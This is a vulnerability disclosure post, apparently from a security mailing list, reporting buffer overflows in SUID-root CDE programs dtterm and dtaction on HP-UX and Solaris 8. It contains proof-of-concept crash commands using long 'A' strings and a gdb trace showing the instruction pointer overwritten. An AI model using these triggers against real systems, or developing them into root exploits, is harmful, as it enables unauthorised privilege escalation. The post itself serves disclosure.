Hi there,

This also works on HP-UX:

======================================================================
# uname -a
HP-UX moon B.11.00 (snip)
# ls -l /usr/dt/bin/dtterm
-r-sr-xr-x   1 root       bin          65536 May 26  1999 /usr/dt/bin/dtterm
# /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
Memory fault(coredump)

# uname -a
HP-UX moon B.10.20 A 9000/785 (snip)
# ls -l /usr/dt/bin/dtterm
-r-sr-xr-x   1 root       bin          53248 May 11  1999 /usr/dt/bin/dtterm
# /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
Memory fault(coredump)
======================================================================

And we noticed that /usr/dt/bin/dtaction on Solaris 8 and HP-UX 10.20
causes a buffer overflow:

======================================================================
(SPARC/Solaris 8)
# uname -a
SunOS unknown 5.8 Generic_108528-10 sun4u sparc SUNW,Sun-Blade-100
# ls -la /usr/dt/bin/dtaction
-r-sr-sr-x   1 root     sys        22808 Dec  2  1999 /usr/dt/bin/dtaction
# /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'`
Segmentation Fault

(intel/Solaris 8)
# uname -a
SunOS unknown 5.8 Generic_108529-09 i86pc i386 i86pc
# ls -la /usr/dt/bin/dtaction
-r-sr-sr-x   1 root     sys        22496 Dec  2  1999 /usr/dt/bin/dtaction
# /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'`
Segmentation Fault
# gdb /usr/dt/bin/dtaction --core=core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.8"...
(no debugging symbols found)...
Core was generated by `./dtaction -tn AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/dt/lib/libDtSvc.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/dt/lib/libDtSvc.so.1
Reading symbols from /usr/dt/lib/libXm.so.4...(no debugging symbols found)...done.
Loaded symbols for /usr/dt/lib/libXm.so.4
Reading symbols from /usr/openwin/lib/libXt.so.4...(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libXt.so.4
Reading symbols from /usr/openwin/lib/libX11.so.4...(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libX11.so.4
Reading symbols from /usr/dt/lib/libSDtFwa.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/dt/lib/libSDtFwa.so.1
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libc.so.1
Reading symbols from /usr/dt/lib/libtt.so.2...(no debugging symbols found)...
---Type <return> to continue, or q <return> to quit---
done.
Loaded symbols for /usr/dt/lib/libtt.so.2
Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libsocket.so.1
Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libnsl.so.1
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libdl.so.1
Reading symbols from /usr/lib/libgen.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libgen.so.1
Reading symbols from /usr/openwin/lib/libSM.so.6...(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libSM.so.6
Reading symbols from /usr/openwin/lib/libICE.so.6...(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libICE.so.6
Reading symbols from /usr/openwin/lib/libXext.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libXext.so.0
Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libmp.so.2
Reading symbols from /usr/openwin/lib/libdga.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libdga.so.1
Reading symbols from /usr/lib//liblayout.so...(no debugging symbols found)...done.
Loaded symbols for /usr/lib//liblayout.so
Reading symbols from /usr/lib/nss_files.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/nss_files.so.1
#0  0xdf004141 in ?? ()
(gdb) bt
#0  0xdf004141 in ?? ()
Cannot access memory at address 0x41414141

(HP-UX 10.20)
# uname -a
HP-UX moon B.10.20 A 9000/785 (snip)
# ls -l /usr/dt/bin/dtaction
-r-sr-sr-x   1 root       sys          45056 Feb  5  1999 /usr/dt/bin/dtaction
# /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1083'`
Memory fault(coredump)
#
======================================================================

These /usr/dt/bin/dtaction binaries are installed SUID root. Therefore, it
might be possible to gain root privileges.

Regards,
-----------------------------------------------
ARAI Yuu <y.arai@lac.co.jp>
Network Security Specialist / LAC Computer Security Laboratory
http://www.lac.co.jp/security/